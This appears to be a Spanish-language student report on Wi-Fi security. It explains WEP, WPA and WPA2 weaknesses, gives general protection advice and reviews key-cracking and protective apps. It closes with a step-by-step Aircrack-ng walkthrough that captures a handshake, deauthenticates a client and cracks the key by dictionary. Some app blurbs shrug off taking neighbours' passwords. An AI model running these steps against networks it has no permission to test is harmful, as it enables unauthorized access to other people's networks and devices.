1

INTRODUCCIN
Actualmente la seguridad se ha convertido en uno de los principales problemas de
los sistemas de acceso inalmbrico. Varios elementos han contribuido a ello: el
hecho de que se utilice un medio de transmisin compartido sin control de las
personas o dispositivos con capacidad de acceso a dicho medio, la rpida
implantacin de esta tecnologa en la sociedad, la novedad de la tecnologa
empleada, y una poltica en su desarrollo, que ha primado su expansin y ha
dejado de lado aspectos relativos a su seguridad. Hoy en da se est realizando
un gran esfuerzo en el desarrollo de estndares y tecnologas que eviten estos
problemas de seguridad, manteniendo la filosofa de una conexin mvil.

DESCRIPCIN TECNOLOGAS EXISTENTES Y SU SEGURIDAD

WEP o Wired Equivalente Privacy es el algoritmo opcional de seguridad para
ofrecer proteccin a las redes inalmbricas incluido en la primera versin del IEEE
802.11. El estndar 802.11 ofrece mecanismos de seguridad mediante procesos
de autenticacin y de cifrado. En el modo Ad Hoc la autenticacin puede realizarse
mediante un sistema abierto o mediante un sistema de clave compartida. Un punto
de acceso que reciba una peticin podr conceder autorizacin a cualquier
estacin o solo a aquellas que estn permitidas. Como bien hemos visto en un
sistema de clave compartida tan solo aquellas estaciones que posean una llave
cifrada sern autenticadas.

WPA es el protocolo posterior a WEP, el cual naci como contramedida a las

grandes falencias que posea WEP con respecto a diversos ataques bastante
comunes hoy en da y que son fcilmente realizables dentro de un hogar con un
computador comn y corriente y con software que se encuentra rondando
libremente por internet. WPA implementa la mayora del estndar IEEE 802.11i, y
fue creado como contramedida a la dbil seguridad en las redes mientras 802.11i
era finalizado. WPA fue creado por la Wi-Fi Alliance, la cual es una asociacin
comercial mundial que es formada por una gran red de compaas que trae WiFi y
estandariza su uso.[7] La IEEE es una organizacin de consenso de construccin
de aparatos electrnicos que disea, implementa y avanza la tecnologa global. Su
trabajo encamina la funcionalidad, capacidades e interoperabilidad de una larga

variedad de productos y servicios. El protocolo IEEE 802.11i est dirigido a batir la

vulnerabilidad de la seguridad que sufran en ese entonces las redes de
computadores con respecto a sus protocolos de autenticacin y de codificacin.
Se utiliza en Wi-Fi Protected Access (WPA2) luego de su implementacin en
Internet. WPA adopta la autenticacin de usuarios utilizando una contrasea pre
compartida entre todos los equipos de la red, que de un modo similar al WEP
(TKIP), requiere introducir la misma clave en todos los equipos. El proceso de
TKIP comienza con una clave temporal de 128 bits que es compartida entre los
clientes y los puntos de acceso, luego, se combina la clave temporal con la
direccin MAC de cada uno de los hosts y despus de esto agrega un vector de
inicializacin, al igual que con WEP, para producir la contrasea de encriptacin, la
diferencia radical con el anterior mtodo es la longitud de este (48 bits). Este
procedimiento asegura que cada estacin utilice diferentes claves para cifrar los
datos. Gracias a estos procedimientos la contramedida mientras se implementaba
el nuevo protocolo sirvi de respaldo enorme a la seguridad informtica ya que
logro destruir varios mtodos de ataques en el cual WEP era muy vulnerable,
como se mencionaba al principio. Otra gran diferencia con WEP es que cambia las
claves temporales cada 10.000 paquetes, evitando asi que el atacante tenga
mucha informacin para poder descifrar la clave precompartida. Adems, WPA
incluye proteccin contra ataques de "repeticin" (replay attacks), ya que incluye
un contador de tramas, as pues impide que otros dispositivos enven tramas ya
adoptadas por el dispositivo que recibe.
WPA2/802.11i WPA2 es el nombre dado por la Wifi Alliance a la segunda fase del
estndar IEEE 802.11i. La seguridad es mucho ms fuerte y robusta en
comparacin con el protocolo WPA. WPA2 ya no se basa en un parche temporal
sobre el algoritmo RC4 sino que utiliza el algoritmo de encriptacin AES. Dicho
algoritmo requiere un hardware mucho ms robusto que los anteriores protocolos
por lo que algunos puntos de acceso antiguos no pueden utilizar dicho protocolo.
[12] La implementacin de proteccin que se aplica en el estndar de seguridad
Wifi 802.11a se conoce con el acrnimo CCMP y est basada en el algoritmo AES.
El cifrado que se utiliza es una cifrado simtrico de 128 bits y el vector de
inicializacin tiene una longitud igual que en el WPA, es decir de 48 bits.
VULNERABILIDAD WEP
Debilidad del vector de inicializacin
La implementacin del vector de inicializacin (IV) en el algoritmo WEP tiene
varios problemas de seguridad. Recordemos que el IV es la parte que vara de la
semilla (seed) para impedir que un posible atacante recopile suficiente informacin
cifrada con una misma clave. El estndar 802.11 no especifica cmo manejar el IV.

En principio se debera cambiar en cada trama para mejorar la privacidad, pero no

es obligatorio, por lo tanto cada fabricante elije como tratar el IV y la mayora de
ellos optan por fijar el IV a 0 cada vez que arrancamos la tarjeta e incrementarlo a
1 para cada trama enviada. Esto provoca que las primeras combinaciones de IVs y
clave secreta se repitan muy a menudo. Adems de todo esto, sabemos que el
nmero de IVs diferentes no es demasiado elevado (224=16 millones aprox.), por
lo que terminarn tambin repitindose al cabo de horas o das dependiendo del
trfico de la red. Con esto llegamos a la conclusin de que la repeticin tarde o
temprano se producir. La cantidad de repeticiones depender de la
implementacin que elija cada fabricante para variar el IV (aleatoria, secuencial,
etc.) y de la carga de la red.
Ataques a redes WEP
Como bien se ha dicho a lo largo del proyecto el protocolo de seguridad WEP es
totalmente inseguro en cuanto a protocolos de seguridad. Hay principalmente dos
mtodos de romper la seguridad en este protocolo y por consiguiente obtener su
clave, mediante fuerza bruta y mediante crackeo. El mtodo de fuerza bruta
consiste tan solo en ir probando una tras otra posibles combinaciones de claves
hasta dar con la correcta. Cabe decir que este mtodo adems de poder ser poco
efectivo es muy lento. El otro mtodo, el mtodo de crackeo, averigua la clave
aplicando el proceso de cracking a un conjunto de paquetes #data capturados
previamente. Para capturar esto paquetes se suele inyectar paquetes ARP con el
fin de que se genere movimiento de trfico en la red y poder as hacer una mayor
captura de paquetes.
VULNERABILIDAD WAP
La vulnerabilidad en la tecnologa WPA es un caso particular que se ha hecho mas
popular ultimamente a medida que avanza la tecnologa de ataques, el llamado
Dictionary Attack en el cual el atacante intenta descifrar la clave contenida en el
Handshake la cual es una combinacin encriptada de la clave de acceso. El
Ataque Diccionario intenta forzar la clave adivinando la frase que generalmente
es una combinacin de palabras y nmeros usados comnmente, asi pues, entre
mas grande sea el Diccionario que contenga el programa descifrador mas
posibilidades tiene de encontrar la clave. El mayor problema que tiene este tipo de
ataque es que la informacin de la clave solo se puede obtener en el handshake
entre el servidor y el usuario, por lo tanto no es un ataque rpido, requerir de que
un usuario se conecte durante el periodo que uno busca obtener la clave, o
forzando la desconexin del host Asi pues, Robert Moskowitz declara en
Debilidad en la seleccin de la clave en la interface WPA que La clave utilizada
con menos de 20 caracteres es muy poco probable que evada ataques. . . [13] La

ruptura de claves WPA se basa en dos pasos, capturar el handshake y el crackeo

mediante diccionario. Cada vez que un cliente se conecta a una red con cifrado
WPA, enva un paquete-saludo, o Handshake al AP al que se va a conectar, donde
este paquete-saludo contiene la contrasea encriptada que se desea obtener. El
handshake solo se puede capturar exclusivamente cuando un cliente se conecta al
punto de acceso. Por tanto se abren dos posibilidades, esperar pacientemente a
que el cliente se desconecte y se vuelva a conectar, o bien, forzar la desconexin
del cliente utilizando un ataque de desautenticacin (es esto ltimo lo que siempre
se suele hacer). Una vez obtenido el handshake (no se suele obtener a la primera
por lo que es muy probable que se tenga que intentar varias veces) tan solo
quedara crackear este mediante un diccionario. No obstante no basta con utilizar
cualquier diccionario, ya que cuanto ms tamao y combinaciones tenga el
diccionario ms posibilidades habr de encontrar la clave buscada

MARCO TERICO
WIFI SIN PROTEGER
Existen una serie de ideas generalizadas respecto a la seguridad de los sistemas
en general, y perfectamente aplicable a las redes WIFI, que suelen resultar fatales
a corto o medio plazo, tales como: nadie conoce el sistema, o nadie tiene inters
en el sistema, as pues para qu gastar recursos y tiempo en protegerlo?. Por
desgracia, la experiencia demuestra que ninguno de ambos razonamientos resulta
cierto, y que efectivamente hay ms personas de las que en un principio parece
que conocen de la existencia de ese sistema, y adems, tienen intereses en l.
Las consecuencias ms comunes de ataques a redes WIFI son:
Consumo de ancho de banda: Ahora mismo resulta sorprendentemente sencillo
conseguir una conexin a una de las muchas redes inalmbricas desprotegidas, y
slo un poco ms difcil a alguna de las protegidas con algn tipo de medida
mnima. Como consecuencia de este tipo de acceso no autorizado, el ancho de
banda de las correspondientes redes WIFI se ve claramente mermado, ms an si
stas son utilizadas como medio de acceso a conexiones de tipo ADSL, cable
mdem, etc.
Acceso no autorizado a equipos: En general, las protecciones frente a equipos
externos a la red local suelen ser ms fuertes que aquellas que se aplican frente a
equipos que pertenecen a la misma red local. De ah, que en el momento que un
equipo no autorizado se conecta a la red inalmbrica, los equipos que se
encuentran conectados a dicha red y los que se encuentran en la misma LAN,

suelen ser muy vulnerables. Las consecuencias de un acceso no autorizado a un

equipo, puede provocar: el robo o destruccin de datos almacenados en dicho
equipo, el robo de claves y contraseas de acceso a cuentas bancarias,
certificados personales, etc.
Responsabilidades legales: Como se ha comentado anteriormente, la instruccin
en la red inalmbrica suele hacer mucho ms vulnerables a los equipos de esa
misma LAN, lo que facilita el acceso no autorizado. A partir de aqu, un equipo
atacado puede servir como equipo atacante de sistemas remotos, esto podra dar
lugar a responsabilidades legales si se considera que el propietario de la red WIFI
o la persona que la ha instalado lo ha hecho de manera descontrolada y sin tener
en cuenta ningn tipo de medida de seguridad preventiva.
RECOMENDACIONES GENERALES DE SEGURIDAD PARA REDES WIFI
1. Utilizar un cortafuegos debidamente configurado.
2. Apagar el receptor Wifi cuando no se est utilizando la red. Aunque ya no
estemos haciendo uso de internet nuestro dispositivo seguir vinculado con el
punto de acceso.
3. Cifrar todo tipo de archivo confidencial o que contenga informacin sensible.
4. No escribir informacin privada o sensible, como por ejemplo informacin
bancaria o personal.
5. En caso de que sea imprescindible enviar informacin sensible asegurarse de
que el sitio web receptor utiliza SSL (en caso afirmativo contara con un icono de
candado en la esquina derecha de la barra del navegador o el nombre http
terminara en s, es decir https).
6. Desactivar Wi-Fi Ad-hoc, con el fin de evitar que nuestro dispositivo se conecte
a otro dispositivo que no conocemos.
7. Utilizar una red privada virtual o VPN.
8. Evitar las conexiones automticas a redes Wi-fi, ya que si no se correra el
riesgo de conectarse a red Wifi abierta que fuese maliciosa.
9. Instalar y configurar debidamente un antivirus.
10. Desconfiar de posibles descargas de aplicaciones Wifi. Estas aplicaciones
suelen ser programas maliciosos.

11. No usar la misma contrasea en diferentes sitios, puesto que si una persona
obtuviese esta contrasea podra entrar en varios sitios y no solo en uno.
12. Instalar programas opcionales de cifrado. Estos programas aumentan la
seguridad de manera que obligan a cifrar todos los datos que se enven (ForceTLS y HTTPSEverywhere). 13. Desactivar la opcin de comparticin de archivos.
14. Utilizar autenticacin de dos pasos, siendo esta mucha ms segura que la
autenticacin por contrasea nica.
2

APLICACIONES PARA PROBAR LA VULNERABILIDAD DE REDES WI-FI

WIFIPASS:
(Android) Para routers de Movistar y Jazztel (WLAN_XXX, Jazztell_XXX)

Wifipass es una pequea herramienta que busca redes WIFI de tipo

JAZZTEL_XXXX y WLAN_XXXX y recupera sus contraseas WPA al
instante.
Wifipass consigue las contraseas auditando la seguridad de ciertos
modelos de router inalmbrico. Si consigues la clave, puedes conectar sin
problemas (siempre tras pedir permiso, por supuesto).
Con Wifipass, obtener la mayora de claves WPA-PSK de los routers que te
rodean. Obviamente, lo que hagas con ellas es cosa tuya. Sin opciones ni
ayuda, es una utilidad solo para gente que sabe lo que hace.
Pros

Descifra al instante muchas claves WPA-PSK

Muy fcil de usar (autoconexin)

Contras

Sin ayuda ni opciones

Peligroso en manos inexpertas

WLANAudit
(Android) Eficaz con routers Zyxel y Comtrend
WLANAudit es una app de auditora de seguridad de redes WiFi.
Aprovechando las particularidades de un algoritmo de dominio pblico, es
capaz de calcular la clave de muchos routers a partir de sus datos.

En la vista detallada, WLANAudit muestra informacin relativa a la direccin

MAC, el tipo de cifrado y su fuerza, la calidad de la seal, su frecuencia,
etctera. Es a partir de estos datos que WLANAudit intenta adivinar la clave
de acceso.
Como su mismo autor afirma, WLANAudit no se ha diseado para hackear
redes inalmbricas ni tampoco robar claves WiFi de los vecinos, sino para
comprobar la seguridad desde el mvil (incluida la propia). Evidentemente,
el uso que hagas de ella solo depende de ti.
Pros

Informacin sobre redes WiFi

Clculo para descifrar las claves

Rpido

Contras

Solo para manos expertas

No descifra algunas claves

Eficacia variable
AirCrack

(Windows, Linux) Desde la versin 0.9, puede descifrar claves WEP en

muy poco tiempo
Aircrack es una herramienta de auditora WiFi. A travs de la captura y
anlisis de los paquetes de red, Aircrack permite descifrar claves WEP y
WPA, haciendo posible el acceso a redes inalmbricas cerradas.
Para usar Aircrack es recomendable hacerse primero con un buen tutorial
(como los que enlazamos en la pestaa Extras de esta ficha). Se trata de
un programa potente, pero difcil de instalar y usar.

Difcil de usar y configurar (por suerte hay documentacin)

Otro problema de Aircrack es que no funciona con todas las antenas WiFi,
aunque el nmero de antenas compatibles es lo bastante alto como para
que la tuya funcione para esnifar paquetes.
Pros

Sniffer de conexiones WiFi

Eficaz en multitu de situaciones

Compatible con muchas antenas

Contras

Instalacin complicada

Manejo difcil sin una gua

Wifiway

(LiveCD) Repletos de herramientas de auditora WiFi y muy popular

Wifiway es un LiveCD repleto de utilidades para la auditora de seguridad y
el anlisis de redes WiFi, Bluetooth y RFID. Incluye utilidades tan conocidas
como Aircrack, Wlandecrypter, Wepattack o Wireshark.

Wifiway no requiere instalacin: solo hay que grabar la imagen ISO en un

CD virgen, introducirlo en el ordenador y arrancar con l. Para iniciar el
entorno grfico, escribe startx en la consola de comandos. El aspecto de
Wifiway es similar al de Knoppix y otras distribuciones Linux LiveCD.
Pros

Docenas de aplicaciones de auditora WiFi

Entorno grfico con soporte internacional

Soporte para drivers Zydas, ipw2200, etc.

Documentacin en la pgina oficial

Versin para arrancar desde USB

Contras

Aprender a usar las herramientas lleva tiempo

Peligroso en manos inexpertas

Router Keygen
(Android)

Router Keygen es una conocida app de auditora WiFi. Calcula claves

WPA/WEP de las que se usan por defecto en muchos routers y mdems
WiFi. Esto resulta til, por ejemplo, para recuperar una contrasea WiFi
perdida o para poner a prueba la seguridad de la misma.

Encuentra claves WPA/WEP

Las redes WiFi detectadas por Router Keygen aparecen en un listado que
muestra su ESSID, direccin de hardware y proteccin. Si estn en verde,
Router Keygen puede calcular la clave WPA/WEP por defecto. La cantidad
de routers soportados es enorme, y crece con cada actualizacin.
Tan popular y eficaz es Router Keygen que su cdigo fuente ha sido usado
por casi todas las apps de auditora inalmbrica para Android, como pulWifi,
ReveLA Wifi o Wifi Unlocker.
ACRYLIC
Acrylic es un programa de anlisis de redes inalmbricas para windows
permite obtener las contraseas de una red WiFi de forma automtica
gracias a un conjunto de scripts incluidos en el programa. Estos scripts de
generacin de contraseas estn programados en c# y es posible agregar
nuevos routers segn se vayan descubriendo fallos para hackear wifi.
Para cada modelo de router Acrylic busca el nombre de la red WiFi, tambin
llamada SSID, la direccin MAC del punto de acceso BSSID y el tipo de
cifrado que utiliza: WEP, WPA o WPA2.

Muchos hackers hacen uso de programas como Acrylic para robar wifi. El
objetivo de esta herramienta es ayudar a los usuarios a proteger la red WiFi
de ataques, saber quin se conecta a mi red wifi y descubrir si las
conexiones a la red se realizan desde dispositivos conocidos.
WIFI Auditor
WiFi Auditor es una herramienta con la que podremos comprobar la
seguridad de las redes WiFi cercanas, lo que a efectos prcticos supondr
ver las contraseas de algunas de estas redes y tener la posibilidad de
conectarse a ellas.
Usar el programa es tan sencillo como hacer clic en el botn de 'auditar
redes' y esperar a que el programa nos muestre automticamente cuales de
todas las redes cercanas tiene poca seguridad. As, en menos de cinco
segundos podremos obtener la contrasea de estas redes. La aplicacin se
encarga de descifrar las claves WPA a partir del nombre y direccin MAC de
la red cercana en caso de que estas mantengan la contrasea que incluye
por defecto el router.

WPS-PIN
Generador de PIN por defecto para routers con WPS. Las funcionalidades
principales son el scanner de redes wireless y conexin a las redes
abiertas.
Sobre las funciones bsicas del scanner, contiene autoscan, scan normal a
peticin, tipos de redes a buscar, bsqueda por WPS, bsqueda por WPS
WPA, bsqueda por WPS WPA2, un status de conexin a red y otro de
descripcin de redes wireless.

Se realiza la conexin a las redes abiertas pulsando sobre la red abierta,

para el resto de redes wireless se invoca a la configuracin del wifi.

Algoritmos originales descubiertos por Zaochesung (ComputePIN) y Stefan

Viehbck (easyboxPIN), aadido PIN por defecto para routers conocidos.

APLICACIONES PARA REFORZAR LA SEGURIDAD A REDES WI-FI

WiFi Protector
WiFi Protector es una aplicacin que aade seguridad a tu conexin
inalmbrica usando VPN (Virtual Private Network), estableciendo as una
conexin directa y encriptada entre tu ordenador e Internet.

Superando restricciones de zona

WiFi Protector cuenta con una seccin que detecta qu proteccin tienen
las conexiones a las que has accedido, as como una lista de los
dispositivos conectados a la red, dando permisos slo a los dispositivos de
confianza.
WiFi Protector tambin permite saltarse las restricciones regionales de
algunas webs de streaming como Hulu o Netflix.
Pros

Configuracin muy sencilla

Enmascara correctamente la direccin IP

Lista de dispositivos y redes de confianza

Sirve para saltarse restricciones regionales

Contras

Instalacin algo tediosa

Desconexiones puntuales
WiFiGuard

Abriremos la aplicacin una vez descargada e instalada. Veremos una

ventana como la anterior, donde existen varias opciones en la zona
superior. Comenzaremos pulsando en Scan Now (o Escanear Ahora si la
hemos configurado en castellano). Ahora la aplicacin comenzar a buscar
en la red en la que est conectado el equipo y nos mostrar los dispositivos
conectados y activos en tiempo real.

Los dispositivos marcados en rojo, son los que son desconocidos para el
programa aunque nosotros podremos ver las propiedades de cada uno, e
indicar que es de confianza. Adems podemos darle un nombre para

identificarlo de forma ms sencilla en un futuro. El usuario tendr as una

lista de los dispositivos conocidos y autorizados de su red. Por ltimo,
recordar que se pueden crear alertas en caso de que se encuentren
dispositivos no autorizados.
Wireless Key Generator
Wireless Key Generator es una sencillsima aplicacin que, sin embargo, te
puede ayudar a proteger tu WiFi. Cmo? Generando contraseas seguras.
Wireless Key Generator te genera contraseas WEP 64 bit, WEP 128 bit,
WEP 256 bit, WPA Light, WPA2 Minimum y WPA2 MAximum de hasta 63
caracteres para que no te tengas que preocupar de crearlas t. Adems,
ofrece la opcin de crear contraseas de la longitud que desees.

Pros

No necesita instalacin

Permite crear contraseas de la longitud que quieras

Contras

Las contraseas generadas no son inquebrantables

Descifrar claves wifi con Aircrack-ng en Kali Linux

Desconctese de todas las redes inalmbricas, abra una terminal, y tipo

airmon-ng.

Esto nos muestra una lista de las tarjetas de red que soportan el modo
monitor.
Ahora empezamos airmon-ng seguido de la interfaz de su red inalmbrica.

Una vez activado el modo monitor anotamos el nombre de la nueva interfaz

de monitor, mon0
Para escanear las redes digitamos

airodump-ng mon0

 Copie el BSSID de destino, el siguiente comando airodump-ng -c 10

--bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

Airdump empezara a monitorear las personas conectadas a la red que

seleccionaste para hackear.

 Abrimos otro terminal escribimos la mac de la maquina principal y de la

estacin que en este caso seria el cliente.
aireplay-ng 0 2 a [router bssid] c [client bssid] mon0
aireplay-ng 0 2 a 00:14:BF:E0:E8:D5 c 4C:EB:42:59:DE:31 mon0

Aparecern los Handshakes

Esto significa que el apretn de manos ha sido capturado, la contrasea

est en manos de los hackers, de alguna forma u otra. Puede cerrar el
terminal aireplay-ng y pulsa Ctrl + C en el terminal airodump-ng para
detener la supervisin de la red, pero no cerrarla sin embargo slo en caso
de que necesite algo de la informacin ms tarde.
Escribimos el siguiente comando en el terminal aircrack-ng a2 b
00:14:BF:E0:E8:D5 w /root/wpa.txt /root/Desktop/*.cap

Esperamos a que analice y nos retorne la contrasea

Bibliografa
http://www.rediris.es/difusion/publicaciones/boletin/73/ENFOQUE1.pdf
http://www.profesores.elo.utfsm.cl/~agv/elo322/1s15/projects/reports/Seguridad_Rede
s_Wifi.pdf